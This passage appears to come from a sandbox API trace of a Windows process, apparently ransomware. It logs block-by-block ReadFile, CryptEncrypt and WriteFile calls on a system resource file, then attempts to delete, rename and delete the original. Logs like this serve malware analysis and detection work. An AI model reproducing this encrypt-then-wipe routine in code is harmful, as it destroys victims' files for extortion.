shared\\ink\\ko-kr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0159.232] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=7168) returned 1 [0159.232] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0159.233] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.234] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.234] GetLastError () returned 0x0 [0159.234] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.235] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.235] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.235] GetLastError () returned 0x0 [0159.235] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.235] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.235] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.235] GetLastError () returned 0x0 [0159.235] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.235] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.236] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.236] GetLastError () returned 0x0 [0159.236] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.236] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.236] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.236] GetLastError () returned 0x0 [0159.236] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.236] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.236] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.236] GetLastError () returned 0x0 [0159.236] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.236] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.236] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.236] GetLastError () returned 0x0 [0159.236] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.236] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.236] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.236] GetLastError () returned 0x0 [0159.236] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.236] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.236] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.236] GetLastError () returned 0x0 [0159.236] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.236] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.237] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.237] GetLastError () returned 0x0 [0159.237] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.237] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.237] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.237] GetLastError () returned 0x0 [0159.237] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.237] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.237] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.237] GetLastError () returned 0x0 [0159.237] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.237] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.237] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.237] GetLastError () returned 0x0 [0159.237] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.237] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.237] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.237] GetLastError () returned 0x0 [0159.237] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.237] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.237] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.237] GetLastError () returned 0x0 [0159.237] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.237] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.237] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.237] GetLastError () returned 0x0 [0159.238] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.238] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.238] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.238] GetLastError () returned 0x0 [0159.238] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.238] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.238] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.238] GetLastError () returned 0x0 [0159.238] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.238] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.238] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.238] GetLastError () returned 0x0 [0159.238] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.238] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.238] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.238] GetLastError () returned 0x0 [0159.238] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.238] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.238] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.238] GetLastError () returned 0x0 [0159.238] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.238] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.238] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.238] GetLastError () returned 0x0 [0159.238] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.238] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.239] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.239] GetLastError () returned 0x0 [0159.239] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.239] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.239] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.239] GetLastError () returned 0x0 [0159.239] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.239] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.239] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.239] GetLastError () returned 0x0 [0159.239] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.239] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.239] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.239] GetLastError () returned 0x0 [0159.239] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.239] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.239] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.239] GetLastError () returned 0x0 [0159.239] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.239] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.239] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0159.239] GetLastError () returned 0x0 [0159.239] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0159.239] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0159.239] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0159.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui")) returned 0x20 [0159.240] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0159.240] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui") returned 1 [0159.240] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui")) returned 0 [0159.240] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" [0159.240] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR") returned 1 [0159.240] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\.xXE153.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\.xxe153.tmp")) returned 0xe153 [0159.241] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\.xXE153.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\.xxe153.tmp"), dwFlags=0x1) returned 0 [0159.241] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft 